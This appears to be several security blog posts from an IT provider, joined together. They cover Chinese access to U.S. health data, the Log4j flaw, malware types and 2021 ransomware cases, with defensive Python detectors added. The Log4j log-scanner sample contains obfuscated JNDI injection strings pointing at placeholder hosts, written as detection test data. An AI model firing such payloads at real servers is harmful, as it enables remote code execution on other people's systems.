With America struggling to set up enough testing and research facilities, the offer was hard to ignore in such desperate times. That is, until the U.S. National Counterintelligence and Security Center (NCSC) raised suspicions and warned against it, saying in a statement that “access to U.S. healthcare and genomic data by China poses serious national security and privacy risk for the United States.” The Chinese biotech group supplying COVID-19 testing kits and helping to set up more than 18 research labs also reportedly planned to use the samples to obtain healthcare data on American citizens, including DNA and PHI.

China’s access to U.S. healthcare data

The People’s Republic of China (PRC) has been seeking America’s ethnically diverse health data for years. According to the NCSC, China has gained access to U.S. healthcare data, including genomic data, through a variety of channels, both legal and illegal, including theft of research and cyberattacks.

According to a report by the Council on Foreign Relations (CFR), China already holds more genetic sequencing data on the U.S. population than the United States holds on its own population.
Chinese companies have also invested in U.S. firms that handle sensitive personal and healthcare data, giving them ready access to U.S. electronic health records (EHR). For example, BGI bought the U.S. genomic sequencing company Complete Genomics in 2013, and China’s WuXi PharmaTech acquired NextCODE Health in the U.S. and later formed WuXi NextCODE Genomics.

Healthcare data breaches attributed to China-based hackers include the theft of personal data and electronic medical records (EMRs). In 2015 Anthem Inc. lost healthcare data on roughly 78 million people, including health identification numbers, names, Social Security numbers, and employment and income information. In 2019 the U.S. Justice Department indicted two individuals based in China for hacking Anthem and three other U.S. companies.

The China Challenge

Bill Evanina, a veteran of both the CIA and the FBI and the former director of the NCSC, also suspected that BGI’s offer of help was a modern-day Trojan horse: use the labs to establish a foothold in the U.S. healthcare market, much like the earlier corporate acquisitions, and then mine health data that even U.S. government agencies cannot access. Further, under the PRC’s national security and intelligence laws, Chinese companies are obligated to hand over the data they collect to the PRC government on request, so any Chinese healthcare company operating on U.S. soil is a national security risk.

We have seen the consequences before. In July 2020 the U.S. Department of Commerce placed two BGI subsidiaries on its Entity List over the PRC government’s use of genetic analysis to repress Uyghurs and other Muslim minorities in Xinjiang.

How did this happen? China has taken advantage of the weak security infrastructure protecting our PHI and EMRs. Policies on the sharing and control of this data need to be revamped at the national and international levels.

China’s BGI has collaborated with many American healthcare and research entities over the past decade, providing genomic sequencing services and, in the process, gaining access to health records and genetic information of U.S. citizens. To date there are not enough regulations and policies to stop internal employees from sharing such information with colleagues at partner companies who may also work for the Chinese government.

Conclusion and Diagnosis

“We have a short term approach to data management, solve the problem today, but that often leads to larger problems down the road.” – Richard Luna, CEO, Protected Harbor

To counter the ever-growing surveillance capabilities of China and other authoritarian states, the U.S. and other nations should take bold action instead of timid half-steps. To begin with, the government needs to strengthen healthcare privacy legislation and regulation. Stronger privacy laws would protect healthcare data not only from foreign states but also from domestic governments and private parties seeking access to it.

Healthcare IT organizations should also raise their standards for user safety and privacy, encryption, reporting, and auditing, so that data can be exchanged without being exposed. Since electronic health records (EHR) are now the norm, every healthcare organization must treat health information and security as inseparable and must comply with HIPAA. The HIPAA Security Rule specifies administrative, physical, and technical safeguards, and three of its technical safeguards map directly onto PHI systems: sessions on systems that hold PHI must log off automatically after a period of inactivity, every user must have a unique login so that access can be audited, and PHI must be encrypted. (Automatic logoff and encryption are “addressable” specifications, which means a covered entity must implement them or document why an alternative gives equivalent protection.)

No healthcare IT department is alone in the battle against illegal, or legal, healthcare data exfiltration. Partnering with a reliable and secure healthcare IT expert such as Protected Harbor can help solve the problem at the grassroots level, and organizations working together can lay the multiple pillars of healthcare data infrastructure that national security requires. We cannot accept our information as safe as things stand, given the scope of data collection on devices and China’s known activity in this area. There are no checks and balances in how data is shared. For example, a company gives a vendor access to billing data to generate reports, but the vendor’s access covers ALL of the data, not just what the reports need; that is a least-privilege failure, and it is the norm. IT departments and the U.S. cybersecurity community need to be heavily invested in the security and safety of this data.
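
One concrete way to close the vendor-access gap described above, as an added example that is not part of the original post or of any product named in it: scope a reporting vendor’s database session to the billing columns only. It uses SQLite’s authorizer hook, which runs while each statement is compiled and sees every table and column the statement would touch. The patient rows, the column allowlist, and the vendor’s queries are all constructed for the example; a production system would do the same with the database’s native grants, views, or row/column-level security.

```python
import sqlite3

# Constructed sample records: names and SSNs are obvious placeholders, not real data.
PATIENTS = [
    (1, "Patient One", "000-00-0001", "E11.9"),
    (2, "Patient Two", "000-00-0002", "I10"),
]
BILLING = [
    (1, 1, "2021-11-02", 250.00),
    (2, 2, "2021-11-03", 80.00),
    (3, 1, "2021-11-10", 125.50),
]

# The allowlist for the reporting vendor: table -> columns it may read. Nothing else.
VENDOR_ALLOWED = {"billing": {"id", "patient_id", "service_date", "amount"}}


def load_sample_db():
    """Owner-side setup: create the schema and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE patients (id INTEGER PRIMARY KEY, name TEXT, ssn TEXT, diagnosis TEXT);
        CREATE TABLE billing  (id INTEGER PRIMARY KEY, patient_id INTEGER,
                               service_date TEXT, amount REAL);
    """)
    conn.executemany("INSERT INTO patients VALUES (?, ?, ?, ?)", PATIENTS)
    conn.executemany("INSERT INTO billing VALUES (?, ?, ?, ?)", BILLING)
    conn.commit()
    return conn


def scope_to_vendor(conn, allowed=VENDOR_ALLOWED):
    """Turn the session into a read-only, column-scoped vendor session.

    SQLite consults the authorizer while compiling each statement and reports
    every table/column the statement would read, so joins, subqueries and
    SELECT * cannot sneak a disallowed column past it."""
    def authorizer(action, arg1, arg2, db_name, trigger_or_view):
        if action in (sqlite3.SQLITE_SELECT, sqlite3.SQLITE_FUNCTION):
            return sqlite3.SQLITE_OK
        if action == sqlite3.SQLITE_READ:
            table, column = arg1, arg2
            # An empty column name means "table referenced, no column read" (e.g. COUNT(*)).
            if table in allowed and (not column or column in allowed[table]):
                return sqlite3.SQLITE_OK
        return sqlite3.SQLITE_DENY  # any other read, and every write/DDL action
    conn.set_authorizer(authorizer)
    return conn


def vendor_report(conn):
    """The one job the vendor was hired for: total billed per patient id."""
    return conn.execute(
        "SELECT patient_id, ROUND(SUM(amount), 2) FROM billing "
        "GROUP BY patient_id ORDER BY patient_id"
    ).fetchall()


def attempt(conn, sql):
    """Run a query in the vendor session; return rows, or the authorizer's refusal."""
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.DatabaseError as exc:
        return f"DENIED: {exc}"


if __name__ == "__main__":
    vendor = scope_to_vendor(load_sample_db())
    print(vendor_report(vendor))
    print(attempt(vendor, "SELECT name, ssn, diagnosis FROM patients"))
    print(attempt(vendor, "SELECT b.amount, p.ssn FROM billing b "
                          "JOIN patients p ON p.id = b.patient_id"))
    print(attempt(vendor, "DELETE FROM billing"))
```

The point of doing this at the database layer rather than in the reporting application is that the vendor’s query text is irrelevant: a join that pulls in patients.ssn is refused at compile time, before any row is read, and so is any attempt to write.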

The U.S. has spent the last decade creating interoperable healthcare systems and China is now using legitimate interconnected companies to capture data. As a result of the COVID-19 outbreak, different technologies and data have been linked at a faster rate than security measures applied to the data. Millions of Americans have lost their DNA and personal information, allowing China to leverage our health information to develop artificial intelligence and precision medicine, putting America’s $100 billion biotechnology industry at a disadvantage. We need to cut the oxygen and this starts from the ground level moving up the ladder to the national level.

Log4j vulnerability puts the internet at risk.


Cybersecurity organizations around the globe have reported the discovery of a critical vulnerability in the Apache Log4j library, and reports of attacks exploiting it are already circulating. Some researchers call it one of the worst vulnerabilities of all time, so how bad is the risk, and what needs to be done now?

Highlights

  • Log4j is an open-source Apache logging framework used by developers to record activities within an application.
  • Log4j’s security vulnerability allows hackers to execute remote commands on a target system, putting countless services at risk of an attack by hackers.
  • Researchers rated this critical java-based library vulnerability 10 out of 10 in CVSS (Common Vulnerability Scoring System).
  • Amazon, Cisco, Apple iCloud, Twitter, Red Hat, Steam, Tesla, and more software companies and services use the Log4j library.

What is Log4j, and Why you’re at risk?

Log4j is a Java-based logging library, one of several Java logging frameworks developed by the Apache Software Foundation; Log4Shell is the name given to the vulnerability in it (CVE-2021-44228). Practically all modern software records errors and other events as logs, and instead of writing a logging system from scratch, developers pull in Log4j because it is open source and mature. That is why it is one of the most widely used logging packages, and why so much software is exposed.

The flaw is in Log4j’s lookup feature. When a string such as ${jndi:ldap://<attacker host>/x} ends up in a log message, vulnerable versions resolve the lookup, contact the attacker-controlled server over JNDI, and can load and run the code it returns. Because almost any attacker-supplied field may be logged (a User-Agent header, a username, a chat message), the bug can be triggered remotely without credentials, and a firewall in front of the application does not help, since the trigger is ordinary application traffic. Attackers began scanning for vulnerable systems within hours and built automated tooling around the exploit; some payloads are self-propagating and spread to further servers when conditions allow.
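
A worked example of the detection side, added here and not code from the original post or from the Apache project: a Python scanner for web-server logs that undoes the nesting tricks attackers used to hide the jndi: keyword from simple string matching (${lower:j}ndi, ${::-j}, ${env:NaN:-j}, and lookups nested inside the callback URL), then reports the callback host so it can be blocked. The log lines are constructed for the example, and the 198.51.100.0/24 and 203.0.113.0/24 addresses are documentation ranges, so nothing here points at a real host.

```python
import re
from urllib.parse import urlsplit

# Constructed sample web-server log lines, not real captures. 198.51.100.0/24 and
# 203.0.113.0/24 are documentation address ranges, so nothing here points at a live host.
SAMPLE_LOG_LINES = [
    '10.0.0.5 "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.10:1389/a}"',
    '10.0.0.8 "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:rmi}://198.51.100.10/x}"',
    '10.0.0.9 "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.5/z}"',
    '10.0.0.10 "GET / HTTP/1.1" 200 "${${env:NaN:-j}ndi:ldap://203.0.113.5/o/${sys:java.version}}"',
    '10.0.0.11 "GET /?q=${date:yyyy} HTTP/1.1" 200 "curl/7.79"',
]

# An innermost ${...} lookup: one with no further "${" nested inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve(lookup: str) -> str:
    """Evaluate one lookup the way Log4j would, for the forms attackers use to
    hide the 'jndi' keyword. ${lower:X}/${upper:X} change case; any ${name:-X}
    falls through to its default value X (this covers ${::-X} and ${env:NaN:-X}).
    Every other lookup is treated as resolving to nothing."""
    if ":-" in lookup:
        return lookup.split(":-", 1)[1]
    if lookup.startswith("lower:"):
        return lookup[len("lower:"):].lower()
    if lookup.startswith("upper:"):
        return lookup[len("upper:"):].upper()
    return ""


def normalize(text: str, max_rounds: int = 32):
    """Collapse nested lookups from the inside out until a jndi: lookup surfaces.
    Returns (normalized_text, payload); payload is None when the line is clean."""
    for _ in range(max_rounds):  # bounded so a pathological line cannot spin forever
        m = _INNER.search(text)
        if m is None:
            return text, None
        body = m.group(1)
        if body.lower().startswith("jndi:"):
            return text, body  # e.g. "jndi:ldap://198.51.100.10:1389/a"
        text = text[:m.start()] + _resolve(body) + text[m.end():]
    return text, None


def callback_host(payload: str) -> str:
    """Host the victim JVM would contact for a 'jndi:<scheme>://host[:port]/...' payload."""
    return urlsplit(payload.split(":", 1)[1]).hostname or ""


def scan(lines):
    """Return [(line_number, payload), ...] for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        _, payload = normalize(line)
        if payload is not None:
            hits.append((number, payload))
    return hits


if __name__ == "__main__":
    for number, payload in scan(SAMPLE_LOG_LINES):
        print(f"line {number}: {payload}  -> block {callback_host(payload)}")
```

The last sample line shows why a plain grep for “jndi” is not enough in either direction: ${date:yyyy} is a legitimate lookup and must not alert, while the obfuscated probes only reveal the keyword after the inner lookups are collapsed. Scanning logs this way finds attempts, not successes; a host that actually reached out to one of the reported callback addresses needs an incident response, not just a block rule.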

On Friday, December 10, the United States Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory on the Log4j vulnerability, as did Australia’s ACSC, and New Zealand’s NCSC added that the vulnerability was being actively exploited. The U.S. Department of Homeland Security also posted about it on Twitter, in case you think we are exaggerating.


Is cPanel plugin also vulnerable?

cPanel, in simple terms, is a Linux-based web hosting control panel. Website developers use it to manage the hosting environment: backups, FTP, email, and so on. It gives a hosting account a graphical user interface (GUI) that works much like a desktop, from which you can change the PHP version a site uses, control the firewall, and add a TLS certificate, among other things. BuiltWith, a web technology profiler, estimates that more than three million sites run on cPanel, and every one of those installations needed to be checked for Log4j exposure.

So what happens now?

Apache rushed out a fix, and thousands of IT teams worldwide have been scrambling to upgrade to Log4j 2.15.0, the most effective remedy at the time of writing. (That first fix turned out to be incomplete; Apache followed it within days with 2.16.0 and then 2.17.0, so upgrade to the latest 2.17.x or later release rather than stopping at 2.15.0.) Even with patches available, applying them everywhere is a slow job: web servers and application stacks are layered with multiple levels of code and customized to each environment, and Log4j is often buried inside vendor software and transitive dependencies, so it could take months to get everything upgraded.

It is not the first time we have seen a vulnerability like this, and it will not be the last. In the long run you are constantly exposed to critical flaws in widely used tools and plugins. There are two roads from here: stay on the vulnerable system you already have, or move to a proactive service provider who takes care of it all.

Get secured

Technology is getting better and faster every day, and that means there are loopholes, attacks, and inevitable vulnerabilities. At Protected Harbor, customers’ safety and security is the utmost priority, and we stand behind our customers at all costs.

“What makes us different is we expect attacks,” commented Protected Harbor CEO Richard Luna. “We assume at any point a system can be compromised and plan for it by limiting the extent of data loss.  We prepare for failure at every hardware and software level, from multiple failover firewalls and multiple redundancy resilient databases to web servers and everything in between.  We protect our clients. After all, our name is Protected Harbor.”

Protected Harbor’s proactive security is one of the strongest shields against these attacks. The company’s remote servers and air-gapped data backups add to that level of security and functionality. Rapid mitigation and resolution are also faster than the industry standard because our clients are not limited to a single network.

While regular MSPs have used cloud backups, we use a direct 10 GB pipe to our house. Those MSPs have to wait for the restore to download the image from the cloud, which can take a very long time. Our servers and solutions are all in-house, so in an emergency we can switch data between servers and bring up a restored image immediately.

There’s a lot more to it. Check how secure you are.

What varieties of viruses and ransomware are there?


In this digital age, viruses and ransomware are a growing security concern for computer users. The threat of malicious software is real, and understanding the different kinds is essential to protecting yourself and your data. “Malware” is the umbrella term; the main categories covered here are viruses, worms, ransomware, Trojans, bots, and spyware, each with its own characteristics and potential harm. With some basic knowledge, computer users can defend themselves better, and knowing the differences between these types and their capabilities is the first step to keeping your computer safe and secure.

Virus:

A computer virus is a malicious code or program written to alter how a computer operates and is designed to spread from one computer to another. A virus operates by inserting or attaching itself to a legitimate program or document that supports macros to execute its code. In the process, a virus can potentially cause unexpected or damaging effects, such as harming the system software by corrupting or destroying data.

Two kinds of virus that cause headaches for defenders are multipartite and polymorphic viruses. Multipartite viruses infect through multiple vectors at once (for example both the boot sector and executable files), while polymorphic viruses rewrite their own code on each infection to evade signature-based detection. Understanding and defending against these adversaries is crucial to safeguarding your systems.

A macro virus is malicious code written in the macro language of an application such as Microsoft Office; it replicates by modifying other files that contain macros, and it remains popular with attackers because a malicious Office attachment is an easy phishing lure. Macro viruses spread from one computer to another and can corrupt data or programs and make systems run slowly or crash, so users need to take preventive measures, such as keeping macros from untrusted documents disabled.

Worm:

A computer worm is malware that spreads copies of itself from computer to computer across a network, and sometimes across different operating systems. A worm replicates without any human interaction and does not need to attach itself to a program to cause damage.

Ransomware:

The idea behind ransomware, a form of malicious software, is simple: Lock and encrypt a victim’s computer or device data, then demand a ransom to restore access.

In many cases, the victim must pay within a set time or risk losing access forever. And since the people running the attack are criminals, paying the ransom does not guarantee that access will be restored.

Ransomware holds your personal files hostage, keeping you from your documents, photos, and financial information. Those files are still on your computer, but the malware has encrypted your device, making the data stored on your computer or mobile device inaccessible.
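
An added example, not from the original post, of how a defender can spot the file-encryption stage described above: score files by Shannon entropy and flag the ones that suddenly look like random bytes (unless their format is compressed by design), or that carry a ransom-style extension or ransom-note name, then raise an alarm when a whole directory trips the check at once. The file contents, the extension lists, and the note markers are constructed for the example; the “ciphertext” is deterministic pseudo-random data standing in for real encrypted output.

```python
import math
import os
import random


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, close to 8.0 for ciphertext or random
    bytes, typically 4 to 5 for English text and uncompressed office documents."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


# Formats that are high-entropy by design; a .jpg that looks random is normal.
COMPRESSED_EXT = {".zip", ".7z", ".gz", ".png", ".jpg", ".jpeg", ".mp4", ".pdf"}
# Extensions and note-name fragments modelled on what ransomware appends and drops
# (constructed lists for the example; a real deployment would maintain a fuller set).
RANSOM_EXT = {".locked", ".crypt", ".enc", ".encrypted"}
NOTE_MARKERS = ("decrypt", "recover_files", "restore_files")


def classify(name: str, data: bytes, threshold: float = 7.2):
    """Return (entropy, reasons); an empty reasons list means the file looks benign."""
    base = os.path.basename(name).lower()
    ext = os.path.splitext(base)[1]
    ent = shannon_entropy(data)
    reasons = []
    if ext in RANSOM_EXT:
        reasons.append("ransom-style extension")
    if any(marker in base for marker in NOTE_MARKERS):
        reasons.append("ransom-note filename")
    if ent >= threshold and ext not in COMPRESSED_EXT:
        reasons.append(f"entropy {ent:.2f} too high for {ext or 'an extensionless file'}")
    return ent, reasons


def scan_snapshot(files, threshold: float = 7.2):
    """files: {path: content}. Returns {path: reasons} for every suspicious file."""
    flagged = {}
    for name, data in files.items():
        _, reasons = classify(name, data, threshold)
        if reasons:
            flagged[name] = reasons
    return flagged


def mass_encryption_suspected(files, min_fraction: float = 0.5) -> bool:
    """Alarm when at least half of a directory snapshot looks encrypted or renamed;
    a single odd file is noise, a directory full of them is an incident."""
    if not files:
        return False
    return len(scan_snapshot(files)) / len(files) >= min_fraction


def _pseudo_ciphertext(seed: int, n: int = 4096) -> bytes:
    """Deterministic stand-in for encrypted output (constructed; not a real cipher)."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed directory snapshot: what a file share looks like mid-attack.
SAMPLE_FILES = {
    "docs/notes.txt": b"Meeting notes: review the Q3 budget and the vendor contract.\n" * 60,
    "docs/photo.jpg": _pseudo_ciphertext(1),            # high entropy is normal for JPEG
    "docs/invoice.docx.locked": _pseudo_ciphertext(2),  # encrypted and renamed
    "docs/quarterly.xlsx": _pseudo_ciphertext(3),       # encrypted in place, name kept
    "docs/HOW_TO_DECRYPT.txt": b"Your files have been encrypted. Pay to get them back.\n",
}


if __name__ == "__main__":
    for path, reasons in scan_snapshot(SAMPLE_FILES).items():
        print(path, "->", "; ".join(reasons))
    print("mass encryption suspected:", mass_encryption_suspected(SAMPLE_FILES))
```

The entropy test is what catches the quarterly.xlsx case, where the ransomware encrypted the file in place and kept its name; extension and note-name checks alone would miss it. The compressed-format allowlist keeps ordinary photos and archives from generating noise, and the directory-level threshold is what turns a per-file heuristic into a usable alarm.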

Who are the targets of ransomware attacks?

Ransomware can spread opportunistically across the Internet with no specific target, and it is one of the most common forms of malware. But because this file-encrypting malware is operated by people, cybercriminals can also choose their targets, and they go after those who can, and are more likely to, pay larger ransoms.

Trojan:

A Trojan horse, or Trojan, is a type of malicious code or software that looks legitimate but can take control of your computer. A Trojan is designed to damage, disrupt, steal, or inflict some other harmful action on your data or network.

A Trojan acts like a bona fide application or file to trick you. It seeks to deceive you into loading and executing the malware on your device. Once installed, a Trojan can perform the action it was designed for.

A Trojan is sometimes called a Trojan virus or a Trojan horse virus, but that is a misnomer: a virus can execute and replicate itself, while a Trojan cannot. A user has to run a Trojan. Even so, “Trojan malware” and “Trojan virus” are often used interchangeably.

Bots:

Bots, or Internet robots, are also known as spiders, crawlers, and web bots. While they may be utilized to perform repetitive jobs, such as indexing a search engine, they often come in the form of malware. Malware bots are used to gain total control over a computer.

The Good

One typical “good” bot gathers information; bots in that role are called web crawlers. Another “good” use is automated interaction with instant messaging, Internet Relay Chat (IRC), or other web interfaces. Dynamic interaction with websites is yet another positive use of bots.

The Bad

Malicious bots are defined as self-propagating malware that infects its host and connects back to a central server(s). The server functions as a “command and control center” for a botnet or a network of compromised computers and similar devices. Malicious bots have the “worm-like ability to self-propagate” and can also:

  • Gather passwords
  • Obtain financial information
  • Relay spam
  • Open the back doors on the infected computer

Malware:

Malware is an abbreviated form of “malicious software.” This is software specifically designed to gain access to or damage a computer, usually without the owner’s knowledge. There are various types of malware, including spyware, ransomware, viruses, worms, Trojan horses, adware, or any malicious code that infiltrates a computer.

Each type of malware has its own purpose and potential impacts, making it important to be aware of the different types of malware. We can protect ourselves from these malicious software threats with the right knowledge and resources.

Generally, the software is considered malware based on the creator’s intent rather than its actual features. Malware creation is rising due to money that can be made through organized Internet crime. Originally malware was created for experiments and pranks, but eventually, it was used for vandalism and destruction of targeted machines. Today, much malware is created to make a profit from forced advertising (adware), stealing sensitive information (spyware), spreading email spam or child pornography (zombie computers), or extorting money (ransomware).

The best protection from malware — whether ransomware, bots, browser hijackers, or other malicious software — continues to be the usual preventive advice: be careful about what email attachments you open, be cautious when surfing by staying away from suspicious websites, and install and maintain an updated, quality antivirus program.

Spyware:

Spyware is unwanted software that infiltrates your computing device, stealing your internet usage data and sensitive information. Spyware is classified as a type of malware — malicious software designed to gain access to or damage your computer, often without your knowledge. Spyware gathers your personal information and relays it to advertisers, data firms, or external users.

Spyware is used for many purposes. Usually, it aims to track and sell your internet usage data, capture your credit card or bank account information, or steal your personal identity. How? Spyware monitors your internet activity, tracking your login and password information, and spying on your sensitive information.

Top 10 Ransomware Attacks 2021


Ransomware Definition

Ransomware is a type of malware (malicious software) that threatens to publish or prevent access to data or a computer system, typically by encrypting it. The victim is faced with the ultimatum of either paying a ransom or risking the publication or permanent loss of their data or access to their system. The ransom demand usually involves a deadline. If the victim doesn’t pay on time, the data is permanently lost, or the ransom is increased.

Ransomware attacks are all too frequent these days, hitting organizations large and small in North America, Europe, and beyond. Cybercriminals will target any customer or company, and victims come from every sector of the economy.

The FBI and other government agencies, like the No More Ransom Project, advise against paying the ransom: it funds the next attack, and it does not guarantee that the encrypted data will be recovered. If the ransomware and the intrusion behind it are not fully removed from the environment, victims who pay are frequently attacked again.

History and Future of Ransomware

According to Becker’s Hospital Review, the first known ransomware attack occurred in 1989 and targeted the healthcare sector. More than three decades later, healthcare remains a top target for ransomware attacks.

That first attack was launched in 1989 by Joseph Popp, Ph.D., an AIDS researcher, who mailed 20,000 floppy disks to AIDS researchers in more than 90 countries, claiming the disks contained a questionnaire-based program that assessed an individual’s risk of acquiring AIDS.

The disk also carried a malware program that lay dormant until the computer had been started 90 times. Once that threshold was reached, the malware hid the user’s directories, scrambled file names, and displayed a message demanding $189 for a one-year software lease or $378 for a lifetime lease. The attack became known as the AIDS Trojan or PC Cyborg.

There is no end to ransomware in sight. Ransomware-as-a-service (RaaS) attacks skyrocketed in 2021 and will continue to rise: according to published 2021 ransomware statistics, about 304.7 million ransomware attacks were attempted in the first half of the year alone, and many more went unreported.

A recent report by Tripwire supported the fact that ransomware will keep growing, and the post-ransomware costs will keep climbing significantly. There’s no denying the fact that Ransomware is being used as a weapon, and how ransomware spreads is no longer a mystery.

Modern-day attacks target operational technology, operating system, medical and healthcare services, third-party software, and IoT devices. Fortunately, organizations don’t have to be sitting ducks; they can minimize the risk of attacks by being proactive and having a reliable ransomware data recovery infrastructure.

Top Ransomware Attacks

1. Kia Motors

Kia Motors America (KMA) was hit by a ransomware attack in February that affected both internal and customer-facing systems, including mobile apps, payment services, phone services, and dealership systems. The attack also impacted the IT systems dealers needed to deliver new vehicles.

DoppelPaymer was thought to be the ransomware family that hit Kia, and the threat actors claimed to have also targeted Kia’s parent business, Hyundai Motors America. Similar system failures were also experienced by Hyundai.

Kia and Hyundai, however, denied being attacked by ransomware, a common stance victims take to protect their reputation and customer loyalty.

2. CD Projekt Red

In February 2021, a ransomware attack hit CD Projekt Red, the video game studio in Poland, delaying work on patches for its recent release, Cyberpunk 2077. The threat actors claimed to have stolen source code for several of the company’s games, including Cyberpunk 2077, Gwent, The Witcher 3, and an unreleased version of The Witcher 3.

According to CD Projekt Red, the unlawfully obtained material is currently being distributed online. Following the incident, the company installed many security measures, including new firewalls with anti-malware protection, a new remote-access solution, and a redesign of critical IT infrastructure, according to the company.

3. Acer

Acer, a Taiwanese computer manufacturer, was hit by the REvil ransomware outbreak in March. This attack was notable because it demanded a ransom of $50,000,000, the greatest known ransom to date.

According to Advanced Intelligence, the REvil gang targeted a Microsoft Exchange server on Acer’s domain before the attack, implying that the Microsoft Exchange vulnerability was weaponized.

4. DC Police Department

The Metropolitan Police Department in Washington, D.C., was hit by ransomware from the Babuk gang, a Russian ransomware syndicate. The police department refused to pay the $4 million demanded by the group in exchange for not exposing the agency’s information and encrypted data.

Internal material, including police officer disciplinary files and intelligence reports, was massively leaked due to the attack, resulting in a 250GB data breach. Experts said it was the worst ransomware attack on a police agency in the United States.

5. Colonial Pipeline

The Colonial Pipeline ransomware assault in 2021 was likely the most high-profile of the year. The Colonial Pipeline transports roughly half of the fuel on the East Coast. The ransomware attack was the most significant hack on oil infrastructure in US history.

On May 7, the DarkSide group infected the organization’s computerized pipeline management equipment with ransomware. DarkSide’s attack vector, according to Colonial Pipeline’s CEO, was a single hacked password for an active VPN account that was no longer in use. Because Colonial Pipeline did not use multi-factor authentication, attackers could access the company’s IT network and data more quickly.

6. Brenntag

In May, Brenntag, a German chemical distribution company, was also struck by a DarkSide ransomware attack around the same time as Colonial Pipeline. According to DarkSide, the hack targeted the company’s North American business and resulted in the theft of 150 GB of critical data.

According to DarkSide affiliates, they got access by buying stolen credentials. Threat actors frequently buy stolen credentials, such as Remote Desktop credentials, on the dark web, which is why multi-factor authentication and detecting unsafe RDP connections are critical.

DarkSide’s first demand was 133.65 Bitcoin, or nearly $7.5 million, which would have been the highest payment ever made. Through negotiation, Brenntag reduced the ransom to $4.4 million, which it paid.
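The Brenntag and Colonial Pipeline cases above both come down to remote access with stolen or stale credentials and no MFA. As an added illustration of the “detecting unsafe RDP connections” point (example code written for this article, not Protected Harbor’s tooling), the following Python walks a constructed key=value export of Windows Security events and flags two things a defender would want to see: RDP (logon type 10) successes from outside the organization’s own address ranges, and an RDP success that follows a burst of failures for the same account and source. The log format, the sample lines and the internal network list are all assumptions for the example.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample lines (not real log data) in a simplified key=value export of
# Windows Security events. 4624 = successful logon, 4625 = failed logon,
# LogonType 10 = RemoteInteractive, i.e. an RDP session.
SAMPLE_EVENTS = [
    "EventID=4624 LogonType=10 TargetUserName=alice IpAddress=10.0.5.23",
    "EventID=4624 LogonType=10 TargetUserName=svc-backup IpAddress=203.0.113.77",
    "EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=198.51.100.9",
    "EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=198.51.100.9",
    "EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=198.51.100.9",
    "EventID=4624 LogonType=10 TargetUserName=administrator IpAddress=198.51.100.9",
    "EventID=4624 LogonType=2 TargetUserName=bob IpAddress=127.0.0.1",
    "EventID=4624 LogonType=10 TargetUserName=carol IpAddress=-",
]

# Assumed list of the organization's own ranges; anything else is treated as external.
INTERNAL_NETWORKS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")
]

EVENT_RE = re.compile(
    r"EventID=(?P<event>\d+)\s+LogonType=(?P<ltype>\d+)\s+"
    r"TargetUserName=(?P<user>\S+)\s+IpAddress=(?P<ip>\S+)"
)


def parse_event(line):
    """Parse one constructed event line into a dict, or None if it does not match."""
    m = EVENT_RE.search(line)
    if not m:
        return None
    return {"event": int(m["event"]), "ltype": int(m["ltype"]),
            "user": m["user"], "ip": m["ip"]}


def is_external(ip_text):
    """True when the address is routable and not in INTERNAL_NETWORKS ('-' or garbage is not)."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return not any(ip in net for net in INTERNAL_NETWORKS)


def find_unsafe_rdp(lines, failure_threshold=3):
    """Return (user, ip, reason) tuples for RDP logons a defender should review."""
    findings = []
    failures = Counter()          # (user, ip) -> failed RDP attempts seen so far
    for line in lines:
        e = parse_event(line)
        if not e or e["ltype"] != 10:
            continue              # only RemoteInteractive (RDP) logons matter here
        key = (e["user"], e["ip"])
        if e["event"] == 4625:
            failures[key] += 1
            continue
        if e["event"] != 4624:
            continue
        if is_external(e["ip"]):
            findings.append((e["user"], e["ip"], "rdp-from-external"))
        if failures[key] >= failure_threshold:
            findings.append((e["user"], e["ip"], "success-after-repeated-failures"))
            failures[key] = 0     # reset so one burst yields one finding
    return findings


if __name__ == "__main__":
    for user, ip, reason in find_unsafe_rdp(SAMPLE_EVENTS):
        print(f"{reason:35} user={user} source={ip}")
```

On real systems the same logic would run over exported Security-log events (or the SIEM’s normalized copy of them); the value is in the two conditions, not the toy parser. A success from an external address, or right after a string of failures, is exactly the pattern a purchased or guessed credential produces when MFA is absent.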

7. Ireland’s Health Service Executive (HSE)

In May 2021, a variation of Conti ransomware infected Ireland’s HSE, which provides healthcare and social services. The organization shut down all of its IT systems after the incident. Many health services in Ireland were impacted, including the processing of blood tests and diagnoses.

The HSE refused to pay the $20 million ransom in Bitcoin because the Conti ransomware group provided the decryption key for free. However, the Irish health service was still subjected to months of substantial disruption as it worked to repair 2,000 IT systems that had been infected by the ransomware.

8. JBS

Also, in May 2021, JBS, the world’s largest meat processing plant, was hit by a ransomware attack that forced the company to stop the operation of all its beef plants in the U.S. and slow the production of pork and poultry. The cyberattack significantly impacted the food supply chain and highlighted the manufacturing and agricultural sectors’ vulnerability to disruptions of this nature.

The FBI identified the threat actors as the REvil ransomware-as-a-service operation. According to JBS, the threat actors targeted servers supporting North American and Australian IT systems. The company ultimately paid a ransom of $11 million to the Russian-based ransomware gang to prevent further disruption.

9. Kaseya

Kaseya, an IT services company for MSP and enterprise clients, was another victim of REvil ransomware, this time during the July 4th holiday weekend. Although only 1% of Kaseya’s customers were breached, an estimated 800 to 1,500 small to mid-sized businesses were affected through their MSPs. Among them was Coop, a Sweden-based supermarket chain, which had to temporarily close 800 stores because it could not open its cash registers.

